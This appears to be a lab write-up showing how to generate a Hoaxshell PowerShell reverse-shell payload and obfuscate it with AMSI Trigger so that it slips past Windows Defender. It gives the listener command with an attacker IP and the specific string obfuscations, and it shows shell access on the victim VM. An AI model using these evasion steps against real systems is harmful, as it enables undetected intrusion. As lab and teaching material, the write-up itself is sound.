Evading Detection with Hoaxshell Obfuscation — A Tool to Bypass Windows Defender
Introduction
In this ethical hacking project, I demonstrate how to generate and obfuscate a PowerShell payload to bypass Windows Defender Antivirus undetected using Hoaxshell.
Hoaxshell is a Windows reverse shell tool that can generate a PowerShell backdoor payload and handler that abuses the https protocol and can be undetected by Windows Defender and possibly other AV solutions.
Windows Defender has been able to detect Hoaxshell lately, but with a tool called AMSI Trigger, we can modify our PowerShell backdoor generated by Hoaxshell. This will allow us to bypass Windows Defender undetected and possibly other Antiviruses.
Before we begin, it’s important to note that for an ideal penetration test, it is advisable to download AMSI Trigger on a separate Windows machine to avoid triggering alerts and creating unnecessary noise. However, we will utilize both AMSI Trigger and the PowerShell payload on the Windows 10 victim machine for this educational example.
I adhered to ethical standards throughout this project and never engaged in illegal or malicious activities. However, as a cybersecurity enthusiast, learning about potential vulnerabilities and attack vectors is crucial to better protect against them.
Disclaimer:
All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.
Lab Setup
I have two virtual machines (VM) open for this ethical hacking project:
Kali Linux (attacker)
Windows 10 (victim)
On Windows 10 victim, I have all the security options enabled, and it’s fully updated and patched.
Let’s begin…
Hoaxshell Payload
In Kali Linux, start Hoaxshell by running the following script:
./hoaxshell.py -s 10.40.1.116 -r -H "Authorization"- -s = server (attacker IP address)
- -r = raw payload
- -H=Header (Authorization)
It gives us a raw PowerShell payload, and it creates a listener unique to this payload.
Copy the payload.
Paste the payload in the PowerShell of the victim machine.
Remember, ideally, it wouldn’t be the victim machine, but this is just for demonstration purposes.
As we can see, Windows Defender has blocked the payload.
Copy the payload again.
In the same directory as AMSI Trigger, in the Downloads folder, create a text file.
Paste the payload in the Text Document.
Type the File name as payload.ps1 or whatever you want, and save the file type as All Files.
Delete the New Text Document; it’s no longer needed.
Hold Shift and right-click inside the Downloads directory. Next, click the Open PowerShell window here.
AmsiTrigger
In PowerShell, run the following command:
.\ AmsiTrigger_x64.exe -i .\payload.ps1
The output generated from the command shows us that Windows Defender does not accept the text inside of the double quotes. However, we can compare it better with the payload notepad file open.
In Notepad, we can also modify the payload in three different ways.
- Modify the variables — anything after $ is a variable.
- Uppercase and lowercase letters, such as the first modification below.
- Add single quotes throughout the payload, which is also demonstrated below.
UseBasicParsing → USEBaSicparsing
(Invoke-WebRequest → (Invoke-Web''RequestThe single quotes
($r=iex → ($r=ie''x
-InputObject → -Inpu''tObject
-WebRequest → =WebR''equest 
Save the modified payload.
Click File → Save.
Rerun the AMSI Trigger command. We can see that the payload is not undetected.
.\AmsiTrigger_x64.exe -i .\payload.ps1
Open the payload notepad and copy the newly modified payload.
Paste the newly modified payload in the victim machine.
Execute the newly modified payload in the victim machine.
We have a shell on our victim machine. By typing hostname, we can see the hostname is Admin of the Windows 10 victim machine. We can type ls and see we have AMSITrigger exe and the payload.ps1.
We can also type ipconfig to see the IP address of the Windows 10 victim machine.
All the security options are enabled while we still have the shell running on our victim machine, thus indicating that the payload is undetected.
We can use Ctrl + C to terminate the Hoaxshell.
Conclusion
This article has provided a glimpse into ethical hacking by demonstrating how to employ Hoaxshell, a Windows reverse shell tool, to generate and obfuscate a PowerShell payload for bypassing Windows Defender undetected.
It is crucial to emphasize that the techniques and tools discussed here are intended solely for educational purposes. Therefore, exercising discretion and adhering to legal and ethical standards is essential when using any information presented in this article. The reader is responsible for complying with all applicable laws and regulations governing these tools and techniques.
As cybersecurity enthusiasts, we aim to learn about potential vulnerabilities and attack vectors to enhance our ability to protect against them. By increasing awareness of these issues, we contribute to the collective effort to safeguard individuals and organizations from online threats.
Remember, the information presented in this article should never be used to attack individuals or organizations without their prior consent. It is essential to respect the boundaries of legality and ethical conduct. Misusing the information herein can lead to severe consequences, including legal ramifications.
I hope you have found this article informative and valuable. Your feedback and suggestions are always welcome as we continue to explore diverse topics in the field of cybersecurity. Thank you for your interest and support!
